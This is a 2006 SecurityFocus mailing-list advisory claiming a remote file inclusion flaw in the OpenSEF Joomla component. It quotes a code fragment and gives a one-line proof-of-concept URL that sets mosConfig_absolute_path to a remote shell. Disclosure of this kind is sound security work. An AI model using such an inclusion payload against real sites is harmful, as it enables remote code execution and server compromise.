SecurityFocus

Modification For OpenSEF Remote file Inclusion Aug 19 2006 01:18AM
Outlaw aria-security net (1 replies)

########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #

# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #

# #

########################################################################
###################

#Software: OpenSEF

#Attack method: Remote File Inclusion

#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)

#Source:

require_once( $mosConfig_absolute_path . '/includes/sef.php' );

} else {

// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style

//

************************************************************************
************

#Proof of Concept:

#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

[ reply ]

Re: Modification For OpenSEF Remote file Inclusion Aug 23 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)